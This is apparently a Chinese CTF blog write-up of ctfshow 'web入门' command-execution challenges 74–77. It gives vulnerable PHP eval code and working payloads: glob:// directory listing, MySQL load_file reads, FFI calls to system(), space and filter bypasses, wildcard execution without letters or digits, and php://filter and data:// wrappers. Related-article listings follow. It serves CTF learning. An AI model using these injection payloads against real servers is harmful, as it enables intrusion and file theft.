<?phperror_reporting(0);ini_set('display_errors', 0);if(isset($_POST['c'])){        $c= $_POST['c'];        eval($c);        $s = ob_get_contents();        ob_end_clean();        echo preg_replace("/[0-9]|[a-z]/i","?",$s);}else{    highlight_file(__FILE__);}?>

先用glob://扫目录,在flagx.txt

c=?><?php $a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{echo($f->__toString().' ');
}
exit(0);
?>

再文件包含

c=include('/flagx.txt');exit(0);

也不知道hint给flagc.txt误我是啥意思

web入门75(不懂)
<?php
error_reporting(0);
ini_set('display_errors', 0);
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}
?>

先用glob://扫目录,在flag36.txt

c=?><?php $a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{echo($f->__toString().' ');
}
exit(0);
?>

hint给的用到mysql什么

c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');foreach($dbh->query('select load_file("/flag36.txt")') as $row) {echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e- >getMessage();exit(0);}exit(0);
web入门76
<?php
error_reporting(0);
ini_set('display_errors', 0);
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}
?>

先用glob://扫目录,发现flag36d.txt

c=?><?php $a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{echo($f->__toString().' ');
}
exit(0);
?>

还是用mysql什么,目前还不懂

c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');foreach($dbh->query('select load_file("/flag36d.txt")') as $row) {echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e- >getMessage();exit(0);}exit(0);
web入门77(不懂)
<?php
error_reporting(0);
ini_set('display_errors', 0);
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}
?>

还是glob://扫目录,发现flag36x.txt

c=?><?php $a=new DirectoryIterator("glob:///*");
foreach($a as $f)
{echo($f->__toString().' ');
}
exit(0);
?>

用到FFI,php7.4以上才有

FFI:外部函数接口,是指在一种语言里调用另一种语言代码的技术。PHP的FFI扩展就是一个让你在PHP里调用C代码的技术。

https://www.php.cn/php-weizijiaocheng-415807.html

hint

$ffi = FFI::cdef("int system(const char *command);");

//创建一个system对象

$a=/readflag > 1.txt’; (此处为英文单引号)

//没有回显的

$ffi->system($a);

//通过$ffi去调用system函数

说明:web入门72以后难度高了几个层次,web入门118~124实在是看不懂了,对我这个菜狗来说太难了。

命令执行总结

  • GET传参之过滤
    /*一般类似这种*/
if(isset($_GET['c'])){
  $c = $_GET['c'];
  if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
    eval($c);
  }

}else{
  highlight_file(__FILE__);
}

1.反引号``与system作用相似,但用法不同

system("") echo``

2.读取文件

nl cat tac

3.通配符

*可代表所有,占所有位置

?只能占一个位置

4.字符串拼接 "

5.构造新执行点

c=eval($_GET[a]);&a=system("cat flag.php")

6.php函数

show_source(next(array_reverse(scandir(pos(localeconv())))));

7.文件包含+php伪协议(php://filter

c=include$_GET[“url”]?>&url=php://filter/read=convert.base64- encode/resource=flag.php 再对base64解码

/*或者类似这种*/
if(isset($_GET['c'])){
  $c = $_GET['c'];
  if(!preg_match("/flag/i", $c)){
    include($c);
    echo $flag;

  }
    
}else{
  highlight_file(__FILE__);
}

8.data伪协议(data://text/plain

c=data://text/plain, system("cat fl*");?>

c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/PiA=

9.url编码%09 之类的不算被过滤的数字、字母、%中

%09制表符 %0a换行符 %26是&的url编码 %27是"的url编码

  • GET之绕过空格

    1.url编码%09 %3c

    2.<

    3.$IFS ${IFS}

  • GET之处理命令 >/dev/null 2>&1
    /*一般类似这种*/
if(isset($_GET['c'])){
  $c=$_GET['c'];
  if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
    system($c." >/dev/null 2>&1");
  }
}else{
  highlight_file(__FILE__);
}

    在输入的命令尾截断:(此题先执行输入的命令)

    1.%0a %0A

    2.命令分隔符 ; ||

  • GET之无字母数字的命令执行

    1.当过滤了字母和数字却给了.?时可以考虑用此法:

    先构造POST上传文件的数据包

  <!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST数据包POC</title>
</head>
<body>
<form action="http://74913d56-a9bb-4b74-a597-1b87c462a3d3.challenge.ctf.show/" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
    <label for="file">文件名:</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>

浏览器打开,上传一个简单的文件再抓包

POST后构造poc执行命令/?c=.%20/???/???[@-[]

(注意[@-[]是linux下的匹配符,进行匹配的大写字母)

把内容改成whoami进入www-data

在这里插入图片描述

直接执行命令,说是在bin里,写全代码也行

cat /var/www/html/flag.php

在这里插入图片描述

没过滤数字 . ? 时还可用以下方法

2.压缩包

将flag.php进行压缩

url/?c=/???/???/????2 ????.???意思为

url/?c=/usr/bin/bzip2 flag.php

bzip2是linux下压缩文件的命令

再访问flag.php.bz2下载

3.获取flag的base64编码

url/?c=/???/????64 ????.???意思为

url/?c=/bin/base64 flag.php再解码

  • GET之关于$(())与数学运算

flag in 36.php 构造36

$(())=0

~$(())=-0

( (   ((~ (( (())))=-1

  • POST之禁用函数中执行eval($c)
    c=echo file_get_contents('flag.php');
c=readfile("flag.php");
c=show_source('flag.php');
c=print_r(file('flag.php'));
c=highlight_file("flag.php");
c=var_dump(file('flag.php'));
c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgets($a);echo $line;}//一行一行读取
c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetc($a);echo $line;}/*一个一个字符读取*/
c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetcsv($a);var_dump($line);}
c=include($_GET['1']); &1=php://filter/convert.base64-encode/resource=flag.php
c=include('flag.php');echo $flag;/*前提$flag=flag*/
c=include('flag.php');var_dump(get_defined_vars());
    查看当前目录
    /*以根目录为例*/
print_r(scandir("/"));
var_dump(scandir("/"));
var_export(scandir("/"));
var_export(scandir('/'));exit(0);/*接自POST缓冲区一题*/

    或者

    glob://协议扫描目录

  • POST之缓冲区一题
    <?php
error_reporting(0);
ini_set('display_errors', 0);
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);/*先执行$_POST['c']*/
        $s = ob_get_contents();/*获取缓冲区内容,但不清除*/
        ob_end_clean();/*清空缓冲区,eval($c)信息丢弃*/
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
        /*把拿到的缓冲区信息替换成?后输出/*
}else{
    highlight_file(__FILE__);
}
?>

    执行php代码让后面的匹配缓冲区不执行直接退出

    找flag:

    c=var_export(scandir('/'));exit(0);


    c=include('/flag.txt');exit(0);
c=require('/flag.txt');exit(0);
c=require_once('/flag.txt');exit();
  • 关于POST之glob://协议的更多复杂内容(见ctfshow web入门72~77)
  • 附说明:一些知识点的详细内容见具体题目的wp
Hu'Ting
关注
专栏目录
[ctfshow]web入门——命令执行web72-web77
ShenZ的博客
12-02 2445
ctfshow的命令执行(web72-77)
CTFshow web入门命令执行总结
小白的博客
05-10 482
1、命令执行函数。
ctfshow-web入门72-74
m0_73303597的博客
01-09 582
自用
CTFshow web入门 web57------- web77命令执行wp
最新发布
2202_75289892的博客
08-06 291
过滤了数字字母以及一些符号,输入参数c,题目提示了flag在36.php,由于输入参数后添加了cat c.php,只需要输入36即可,但数字被过滤。$((~ $(())))=-1 对其取反。因此可以37个 -1相加,再取反。
CTFshow 命令执行 web72
Kradress的博客
12-05 514
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); ini_se
ctfshow web72
weixin_74336671的博客
01-29 588
php 也是可以的。eval() 里的语句可以视为在当前 php 文件里加了几条语句,这些语句必须是完整的,即必须以 “;> ” 结尾来结束语句,但是eval里的 “?> ” 不会闭合当前 php 文件。因为 ini_set() 也被限制了,所以 open_basedir() 不能用 ini_set() 重新设置绕过。本题设置了 open_basedir(),将php所能打开的文件限制在指定的。使用 php 伪协议。
ctfshow命令执行 web入门 web69-web73
m0_62207170的博客
04-09 387
ctfshow web入门命令执行web69-73
ctfshow web入门 命令执行web29-web57详解
2401_84009549的博客
04-20 862
当print_r(scandir(pos(localeconv())));时,会返回当前目录,pos(localeconv())的值为"."将数组用array_reverse进行倒转,并用next将指针指向flag.php最后进行读取,列出两个整理起来就是。
CTFSHOW WEB入门 命令执行 web29-web36
m0_53194713的博客
06-26 1326
ctfshow web29 web30 web31
ctfshow-web入门-命令执行-web31
HkD01L的博客
06-24 907
ctfshow,命令执行web31
ctfshow-web入门-命令执行-web30
HkD01L的博客
06-21 287
ctfshow,命令执行,web30
ctfshow-web入门-命令执行web71-web74)
Welcome To Myon'Blog !
06-30 523
我们直接在执行完 include 包语句后执行 exit 强制退出,从而实现绕过 preg_replace 的执行。拿到 flag:ctfshow{3deb8d00-68e6-4c20-a971-3fbf3382ec45}拿到 flag:ctfshow{8fccf5bc-5681-4815-b7ce-0b81772b6f7c}拿到 flag:ctfshow{35309fb4-36c5-4080-874a-6eaa85e03ff0}才发现这道题给了 index.php 的源码。
ctf命令执行漏洞(二)
wlllllianqing的博客
10-15 344
命令执行漏洞(二) 命令执行无回显的判定方法 1.延时 2.http请求 3.dns请求 可使用ping请求,但是nc无法监听ping请求。 linux下的ping不会停止,windows下面的ping会停止 ping -c 3 xxx.xxx.xxx -c 3:ping3次 利用 1.写shell 2.http/dns等方式带出数据 '>'符号:将前面的命令生成的内容写到一个文件中 因为ping ip 是不能出现空格的,所以我们可以构造来消除空格 ...
CTF练习:HTTP服务之命令执行(案例二)
qq_43233085的博客
12-06 370
CTF练习:HTTP服务之命令执行(案例二)环境准备信息收集hash破解上传shell 靶机地址: 链接: https://pan.baidu.com/s/1xsNuHceCqtuK-yUzKuHJdA 提取码: 5l81 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.91.88 ifconfig 查看靶机的I...
ctf 命令执行
weixin_74427106的博客
04-19 517
过滤了等号那可以用include绕过,GET传入的变量可以改变,如果数字被绕过可以使用字母。ctf命令执行,主要就是一些 php中以及linux的一些命令以及一些绕过。eval这个函数有点特殊,它可以将字符串转换成代码执行,所以。执行命令的两个函数 :system以及echo。在一个就是中文字符被绕过可以使用以下函数。如果只是过滤了flag 则直接命令执行
CTFshow web入门 web71~web77 web118~web122 web124 命令执行
qq_56815564的博客
04-21 806
在RANDOM中产生的随机数可以是1、2、3、4、5这个5个数,但1,2,3这三个出现的概率很低,所以基本上是4或5,因此如果要使用RANDOM的话其实也有碰运气的成分在里面,没准就撞到了正确的数。回到构造 4 这个字符上,再Linux中,${#xxx}显示的是这个数值的位数,而如果不加 # 的话就是显示这个数原本的值,比如12345再加上#后就是5。像 /bin/cat flag.php 之类的也是可以的,这个只需要构造一个 t 和 / 就行了,构造出来的长度也短一些。
ctfshow-Web入门-58~74wp
yutianovo的博客
09-24 1121
Web58-65 POST c=include($_GET['url']); GET /?url=php://filter/read=convert.base64-encode/resource=flag.php Web66-70 flag 换位置了 /flag.txt Payload还可以用 Web71 import requests url = "http://c5e8824e-b5b4-4842-8d39-bbcb78eb7976.chall.ctf.show/" d = {'c': 'i
CTFshow-Web入门》08. Web 71~80
学习学习学习......
05-05 2075
eval() 利用,ob_end_clean() 绕过,正则绕过、PHP 垃圾回收机制,伪协议 {glob://}、PDO 利用、FFI 利用、include() 利用、伪协议 {php://},{data://}、一句话木马之 Nginx 日志利用。
CTFshow—web入门——命令执行
h_adam的博客
10-07 4597
web入门——命令执行web29功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 web29 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客
ctfshow web入门命令执行
09-05
CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过技巧,如分号、竖线、双与号等。这些技巧可以用来绕过应用程序对输入参数的限制,从而注入恶意的命令。 引用中提到的payload,其中使用了一个通用的命令执行函数"show_source"来显示指定文件的源代码。这个payload可以用来尝试执行"flag.php"文件的源代码。但前提是要知道有一个名为"flag.php"的文件存在。 另外,引用中提供了另一种payload的示例,其中使用了array_reverse和scandir函数来获取文件目录并显示指定文件的源代码。同样,也可以直接使用show_source('flag.php')来显示"flag.php"文件的源代码。 需要注意的是,命令执行漏洞是非常危险的,因为它可以导致恶意用户执行任意的系统命令。为了保护Web应用程序免受此类攻击,开发人员应该对用户的输入进行严格的验证和过滤,并使用安全的编程实践来防止命令注入漏洞的发生。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [ctfshow web入门命令执行](https://blog.csdn.net/uuzfumo/article/details/128357863)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [CTFShow Web入门 命令执行](https://blog.csdn.net/qq_19533763/article/details/123910732)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值